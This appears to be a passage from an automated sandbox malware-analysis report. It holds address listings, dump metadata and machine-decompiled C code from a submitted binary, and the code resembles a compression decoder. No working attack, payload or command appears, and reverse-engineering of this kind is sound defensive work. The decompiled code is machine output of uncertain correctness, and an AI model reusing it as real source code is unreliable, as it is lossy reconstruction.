                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004069a2
                                                  0x004069a2
                                                  0x004069a8
                                                  0x004069ae
                                                  0x004069b4
                                                  0x004069ce
                                                  0x004069d1
                                                  0x004069d7
                                                  0x004069e2
                                                  0x004069e2
                                                  0x004069e4
                                                  0x004069b6
                                                  0x004069b6
                                                  0x004069c5
                                                  0x004069c9
                                                  0x004069c9
                                                  0x004069ee
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004069f0
                                                  0x004069f4
                                                  0x00406ba3
                                                  0x00406ba3
                                                  0x00000000
                                                  0x00406ba3
                                                  0x004069fa
                                                  0x00406a00
                                                  0x00406a07
                                                  0x00406a0f
                                                  0x00406a12
                                                  0x00406a15
                                                  0x00406a15
                                                  0x00406a1b
                                                  0x00406a1b
                                                  0x00000000
                                                  0x00000000
                                                  0x00406333
                                                  0x00406333
                                                  0x00406335
                                                  0x00406338
                                                  0x004063a9
                                                  0x004063a9
                                                  0x004063ac
                                                  0x004063af
                                                  0x004063b6
                                                  0x004063c0
                                                  0x00000000
                                                  0x004063c0
                                                  0x0040633a
                                                  0x0040633a
                                                  0x0040633e
                                                  0x00406341
                                                  0x00406343
                                                  0x00406346
                                                  0x00406349
                                                  0x0040634b
                                                  0x0040634e
                                                  0x00406350
                                                  0x00406355
                                                  0x00406358
                                                  0x0040635b
                                                  0x0040635f
                                                  0x00406366
                                                  0x00406369
                                                  0x00406370
                                                  0x00406374
                                                  0x0040637c
                                                  0x0040637c
                                                  0x0040637c
                                                  0x00406376
                                                  0x00406376
                                                  0x00406376
                                                  0x0040636b
                                                  0x0040636b
                                                  0x0040636b
                                                  0x00406380
                                                  0x00406383
                                                  0x004063a1
                                                  0x004063a1
                                                  0x004063a3
                                                  0x00000000
                                                  0x00406385
                                                  0x00406385
                                                  0x00406385
                                                  0x00406388
                                                  0x0040638b
                                                  0x0040638e
                                                  0x00406390
                                                  0x00406390
                                                  0x00406390
                                                  0x00406393
                                                  0x00406396
                                                  0x00406398
                                                  0x00406399
                                                  0x0040639c
                                                  0x00000000
                                                  0x0040639c
                                                  0x00000000
                                                  0x004065d2
                                                  0x004065d2
                                                  0x004065d6
                                                  0x004065f4
                                                  0x004065f4
                                                  0x004065f7
                                                  0x004065fe
                                                  0x00406601
                                                  0x00406604
                                                  0x00406607
                                                  0x0040660a
                                                  0x0040660d
                                                  0x0040660f
                                                  0x00406616
                                                  0x00406617
                                                  0x00406619
                                                  0x0040661c
                                                  0x0040661f
                                                  0x00406622
                                                  0x00406622
                                                  0x00406627
                                                  0x00000000
                                                  0x00406627
                                                  0x004065d8
                                                  0x004065d8
                                                  0x004065db
                                                  0x004065de
                                                  0x004065e8
                                                  0x00000000
                                                  0x00000000
                                                  0x0040663c
                                                  0x0040663c
                                                  0x00406640
                                                  0x00406663
                                                  0x00406666
                                                  0x00406669
                                                  0x00406673
                                                  0x00406642
                                                  0x00406642
                                                  0x00406645
                                                  0x00406648
                                                  0x0040664b
                                                  0x00406658
                                                  0x0040665b
                                                  0x0040665b
                                                  0x00000000
                                                  0x00000000
                                                  0x0040667f
                                                  0x0040667f
                                                  0x00406683
                                                  0x00000000
                                                  0x00000000
                                                  0x00406689
                                                  0x00406689
                                                  0x0040668d
                                                  0x00000000
                                                  0x00000000
                                                  0x00406693
                                                  0x00406693
                                                  0x00406695
                                                  0x00406699
                                                  0x00406699
                                                  0x0040669c
                                                  0x004066a0
                                                  0x00000000
                                                  0x00000000
                                                  0x004066f0
                                                  0x004066f0
                                                  0x004066f4
                                                  0x004066fb
                                                  0x004066fb
                                                  0x004066fe
                                                  0x00406701
                                                  0x0040670b
                                                  0x00000000
                                                  0x0040670b
                                                  0x004066f6
                                                  0x004066f6
                                                  0x00000000
                                                  0x00000000
                                                  0x00406717
                                                  0x00406717
                                                  0x0040671b
                                                  0x00406722
                                                  0x00406725
                                                  0x00406728
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040672b
                                                  0x0040672e
                                                  0x00406731
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406744
                                                  0x00406749
                                                  0x00000000
                                                  0x00000000
                                                  0x004067d7
                                                  0x004067d7
                                                  0x004067db
                                                  0x00406b79
                                                  0x00406b79
                                                  0x00000000
                                                  0x00406b79
                                                  0x004067e1
                                                  0x004067e1
                                                  0x004067e4
                                                  0x004067e7
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f4
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f9
                                                  0x004067fc
                                                  0x00000000
                                                  0x00000000
                                                  0x004063cc
                                                  0x004063cc
                                                  0x004063d0
                                                  0x00406b3d
                                                  0x00406b3d
                                                  0x00000000
                                                  0x00406b3d
                                                  0x004063d6
                                                  0x004063d6
                                                  0x004063d9
                                                  0x004063dc
                                                  0x004063e0
                                                  0x004063e3
                                                  0x004063e9
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063ee
                                                  0x004063f1
                                                  0x004063f1
                                                  0x004063f4
                                                  0x004063f7
                                                  0x00000000
                                                  0x00000000
                                                  0x004063fd
                                                  0x004063fd
                                                  0x00406403
                                                  0x00000000
                                                  0x00000000
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640d
                                                  0x00406410
                                                  0x00406413
                                                  0x00406416
                                                  0x00406419
                                                  0x0040641a
                                                  0x0040641d
                                                  0x0040641f
                                                  0x00406425
                                                  0x00406428
                                                  0x0040642b
                                                  0x0040642e
                                                  0x00406431
                                                  0x00406434
                                                  0x00406437
                                                  0x00406453
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645c
                                                  0x00406463
                                                  0x00406467
                                                  0x00406469
                                                  0x0040646d
                                                  0x00406439
                                                  0x00406439
                                                  0x0040643d
                                                  0x00406445
                                                  0x0040644a
                                                  0x0040644c
                                                  0x0040644e
                                                  0x0040644e
                                                  0x00406470
                                                  0x00406477
                                                  0x0040647a
                                                  0x00000000
                                                  0x00406480
                                                  0x00406480
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406485
                                                  0x00406485
                                                  0x00406489
                                                  0x00406b49
                                                  0x00406b49
                                                  0x00000000
                                                  0x00406b49
                                                  0x0040648f
                                                  0x0040648f
                                                  0x00406492
                                                  0x00406495
                                                  0x00406499
                                                  0x0040649c
                                                  0x004064a2
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a7
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064b0
                                                  0x00000000
                                                  0x00000000
                                                  0x004064b2
                                                  0x004064b2
                                                  0x004064b5
                                                  0x004064b8
                                                  0x004064bb
                                                  0x004064be
                                                  0x004064c1
                                                  0x004064c4
                                                  0x004064c7
                                                  0x004064ca
                                                  0x004064cd
                                                  0x004064d0
                                                  0x004064e8
                                                  0x004064eb
                                                  0x004064ee
                                                  0x004064f1
                                                  0x004064f1
                                                  0x004064f4
                                                  0x004064f8
                                                  0x004064fa
                                                  0x004064d2
                                                  0x004064d2
                                                  0x004064da
                                                  0x004064df
                                                  0x004064e1
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064fd
                                                  0x00406504
                                                  0x00406507
                                                  0x00000000
                                                  0x00406509
                                                  0x00406509
                                                  0x00000000
                                                  0x00406509
                                                  0x00406507
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406549
                                                  0x00406549
                                                  0x0040654d
                                                  0x00406b55
                                                  0x00406b55
                                                  0x00000000
                                                  0x00406b55
                                                  0x00406553
                                                  0x00406553
                                                  0x00406556
                                                  0x00406559
                                                  0x0040655d
                                                  0x00406560
                                                  0x00406566
                                                  0x00406568
                                                  0x00406568
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406574
                                                  0x00406512
                                                  0x00406512
                                                  0x00406515
                                                  0x00000000
                                                  0x00406515
                                                  0x00406576
                                                  0x00406576
                                                  0x00406579
                                                  0x0040657c
                                                  0x0040657f
                                                  0x00406582
                                                  0x00406585
                                                  0x00406588
                                                  0x0040658b
                                                  0x0040658e
                                                  0x00406591
                                                  0x00406594
                                                  0x004065ac
                                                  0x004065af
                                                  0x004065b2
                                                  0x004065b5
                                                  0x004065b5
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065be
                                                  0x00406596
                                                  0x00406596
                                                  0x0040659e
                                                  0x004065a3
                                                  0x004065a5
                                                  0x004065a7
                                                  0x004065a7
                                                  0x004065c1
                                                  0x004065c8
                                                  0x004065cb
                                                  0x00000000
                                                  0x004065cd
                                                  0x004065cd
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x0040685a
                                                  0x0040685a
                                                  0x0040685e
                                                  0x00406b85
                                                  0x00406b85
                                                  0x00000000
                                                  0x00406b85
                                                  0x00406864
                                                  0x00406864
                                                  0x00406867
                                                  0x0040686a
                                                  0x0040686e
                                                  0x00406871
                                                  0x00406877
                                                  0x00406879
                                                  0x00406879
                                                  0x00406879
                                                  0x0040687c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040662a
                                                  0x0040662a
                                                  0x0040662d
                                                  0x00000000
                                                  0x00000000
                                                  0x00406969
                                                  0x00406969
                                                  0x0040696d
                                                  0x0040698f
                                                  0x0040698f
                                                  0x00406992
                                                  0x0040699c
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x0040696f
                                                  0x0040696f
                                                  0x00406972
                                                  0x00406976
                                                  0x00406979
                                                  0x00406979
                                                  0x0040697c
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406a26
                                                  0x00406a2a
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a4f
                                                  0x00406a56
                                                  0x00406a5d
                                                  0x00406a5d
                                                  0x00406a64
                                                  0x00406a67
                                                  0x00406a6e
                                                  0x00000000
                                                  0x00406a71
                                                  0x00406a2c
                                                  0x00406a2c
                                                  0x00406a2f
                                                  0x00406a32
                                                  0x00406a35
                                                  0x00406a3c
                                                  0x00406980
                                                  0x00406980
                                                  0x00406983
                                                  0x00000000
                                                  0x00000000
                                                  0x00406b17
                                                  0x00406b17
                                                  0x00406b1a
                                                  0x00406a1b
                                                  0x00406a1b
                                                  0x00406a1b
                                                  0x00000000
                                                  0x00406a21
                                                  0x00000000
                                                  0x00406751
                                                  0x00406751
                                                  0x00406753
                                                  0x0040675a
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a64
                                                  0x00406a64
                                                  0x00406a67
                                                  0x00406a6e
                                                  0x00000000
                                                  0x00406a71
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406796
                                                  0x00406796
                                                  0x00406799
                                                  0x004067cf
                                                  0x004067cf
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x00406902
                                                  0x00406902
                                                  0x00406905
                                                  0x00406907
                                                  0x00406b91
                                                  0x00406b91
                                                  0x00000000
                                                  0x00406b91
                                                  0x0040690d
                                                  0x0040690d
                                                  0x00406910
                                                  0x00000000
                                                  0x00000000
                                                  0x00406916
                                                  0x00406916
                                                  0x0040691a
                                                  0x0040691d
                                                  0x0040691d
                                                  0x0040691d
                                                  0x00000000
                                                  0x0040691d
                                                  0x0040679b
                                                  0x0040679b
                                                  0x0040679d
                                                  0x0040679f
                                                  0x004067a1
                                                  0x004067a4
                                                  0x004067a5
                                                  0x004067a7
                                                  0x004067a9
                                                  0x004067ac
                                                  0x004067af
                                                  0x004067c5
                                                  0x004067c5
                                                  0x004067ca
                                                  0x00406802
                                                  0x00406802
                                                  0x00406806
                                                  0x0040682f
                                                  0x00406832
                                                  0x00406834
                                                  0x0040683b
                                                  0x0040683e
                                                  0x00406841
                                                  0x00406841
                                                  0x00406846
                                                  0x00406846
                                                  0x00406848
                                                  0x0040684b
                                                  0x00406852
                                                  0x00406855
                                                  0x00406882
                                                  0x00406882
                                                  0x00406885
                                                  0x00406888
                                                  0x004068fc
                                                  0x004068fc
                                                  0x004068fc
                                                  0x004068fc
                                                  0x00000000
                                                  0x004068fc
                                                  0x0040688a
                                                  0x0040688a
                                                  0x00406890
                                                  0x00406893
                                                  0x00406896
                                                  0x00406899
                                                  0x0040689c
                                                  0x0040689f
                                                  0x004068a2
                                                  0x004068a5
                                                  0x004068a8
                                                  0x004068ab
                                                  0x004068c4
                                                  0x004068c6
                                                  0x004068c9
                                                  0x004068ca
                                                  0x004068cd
                                                  0x004068cf
                                                  0x004068d2
                                                  0x004068d4
                                                  0x004068d6
                                                  0x004068d9
                                                  0x004068db
                                                  0x004068de
                                                  0x004068e2
                                                  0x004068e4
                                                  0x004068e4
                                                  0x004068e5
                                                  0x004068e8
                                                  0x004068eb
                                                  0x004068ad
                                                  0x004068ad
                                                  0x004068b5
                                                  0x004068ba
                                                  0x004068bc
                                                  0x004068bf
                                                  0x004068bf
                                                  0x004068ee
                                                  0x004068f5
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f
                                                  0x00000000
                                                  0x004068f7
                                                  0x004068f7
                                                  0x00000000
                                                  0x004068f7
                                                  0x004068f5
                                                  0x00406808
                                                  0x00406808
                                                  0x0040680b
                                                  0x0040680d
                                                  0x00406810
                                                  0x00406813
                                                  0x00406816
                                                  0x00406818
                                                  0x0040681b
                                                  0x0040681e
                                                  0x0040681e
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x0040682b
                                                  0x004067ff
                                                  0x004067ff
                                                  0x004067ff
                                                  0x004067ff
                                                  0x00000000
                                                  0x0040682d
                                                  0x0040682d
                                                  0x00000000
                                                  0x0040682d
                                                  0x0040682b
                                                  0x004067b1
                                                  0x004067b1
                                                  0x004067b4
                                                  0x004067b6
                                                  0x004067b9
                                                  0x00000000
                                                  0x00000000
                                                  0x00406518
                                                  0x00406518
                                                  0x0040651c
                                                  0x00406b61
                                                  0x00406b61
                                                  0x00000000
                                                  0x00406b61
                                                  0x00406522
                                                  0x00406522
                                                  0x00406525
                                                  0x00406528
                                                  0x0040652b
                                                  0x0040652e
                                                  0x00406531
                                                  0x00406534
                                                  0x00406536
                                                  0x00406539
                                                  0x0040653c
                                                  0x0040653f
                                                  0x00406541
                                                  0x00406541
                                                  0x00406541
                                                  0x00000000
                                                  0x00000000
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x00406b6d
                                                  0x00406b6d
                                                  0x00000000
                                                  0x00406b6d
                                                  0x004066ad
                                                  0x004066ad
                                                  0x004066b0
                                                  0x004066b3
                                                  0x004066b6
                                                  0x004066b8
                                                  0x004066b8
                                                  0x004066b8
                                                  0x004066bb
                                                  0x004066be
                                                  0x004066c1
                                                  0x004066c4
                                                  0x004066c7
                                                  0x004066ca
                                                  0x004066cb
                                                  0x004066cd
                                                  0x004066cd
                                                  0x004066cd
                                                  0x004066d0
                                                  0x004066d3
                                                  0x004066d6
                                                  0x004066d9
                                                  0x004066d9
                                                  0x004066d9
                                                  0x004066dc
                                                  0x004066de
                                                  0x004066de
                                                  0x00000000
                                                  0x00000000
                                                  0x00406920
                                                  0x00406920
                                                  0x00406920
                                                  0x00406924
                                                  0x00000000
                                                  0x00000000
                                                  0x0040692a
                                                  0x0040692a
                                                  0x0040692d
                                                  0x00406930
                                                  0x00406933
                                                  0x00406935
                                                  0x00406935
                                                  0x00406935
                                                  0x00406938
                                                  0x0040693b
                                                  0x0040693e
                                                  0x00406941
                                                  0x00406944
                                                  0x00406947
                                                  0x00406948
                                                  0x0040694a
                                                  0x0040694a
                                                  0x0040694a
                                                  0x0040694d
                                                  0x00406950
                                                  0x00406953
                                                  0x00406956
                                                  0x00406959
                                                  0x0040695d
                                                  0x0040695f
                                                  0x00406962
                                                  0x00000000
                                                  0x00406964
                                                  0x00406964
                                                  0x004066e1
                                                  0x004066e1
                                                  0x00000000
                                                  0x004066e1
                                                  0x00406962
                                                  0x00406b97
                                                  0x00406b97
                                                  0x00000000
                                                  0x00000000
                                                  0x004061c6
                                                  0x00406bce
                                                  0x00406bce
                                                  0x00000000
                                                  0x00406bce
                                                  0x00406a1b
                                                  0x00406a9b
                                                  0x00406a64

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9f777e2b5f047ff5fac18a6b7d4eccb0398312e185884248bc8ff9efca1ede3f
                                                  • Instruction ID: 0a364959098a1219693739684ad0890dad76377db1f96b1360ce1028e8ac0eba
                                                  • Opcode Fuzzy Hash: 9f777e2b5f047ff5fac18a6b7d4eccb0398312e185884248bc8ff9efca1ede3f
                                                  • Instruction Fuzzy Hash: 7EA15371E00229CBDF28DFA8C8447ADBBB1FB45305F11816ED816BB281C7786A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406969 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E00406969() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
